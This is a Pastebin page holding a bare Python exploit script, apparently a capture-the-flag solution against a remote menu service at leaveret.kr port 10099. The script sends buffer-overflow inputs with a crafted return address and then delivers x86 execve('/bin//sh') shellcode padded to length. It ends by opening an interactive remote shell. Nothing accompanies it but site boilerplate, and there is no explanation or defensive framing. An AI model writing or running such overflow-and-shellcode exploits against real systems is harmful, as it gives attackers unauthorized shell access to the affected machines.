Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import sys
- import telnetlib
- t = telnetlib.Telnet()
- s = socket.create_connection(('leaveret.kr', 10099))
- t.sock = s
- def recv_until(t):
- global s
- d = ''
- while t not in d:
- c = s.recv(1)
- sys.stdout.write(c)
- d += c
- recv_until('Input : ')
- s.send('1\n')
- recv_until(' : ')
- s.send('a' * 504 + '\xA0\xC0' + '@a.a\n')
- recv_until('Input : ')
- s.send('2\n')
- recv_until(' : ')
- s.send('a' * 504 + '\xA0\xC0' + '@a.a\n')
- recv_until('Input : ')
- s.send('5\n')
- recv_until(' : ')
- shellcode = "\x99""\x31\xc0""\x52""\x68\x6e\x2f\x73\x68""\x68\x2f\x2f\x62\x69""\x89\xe3""\x52""\x53""\x89\xe1""\xb0\x0b""\xcd\x80"
- payload = shellcode
- payload += 'A' * (502 - len(payload))
- payload += '@a.a'
- s.send(payload + '\n')
- t.interact()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
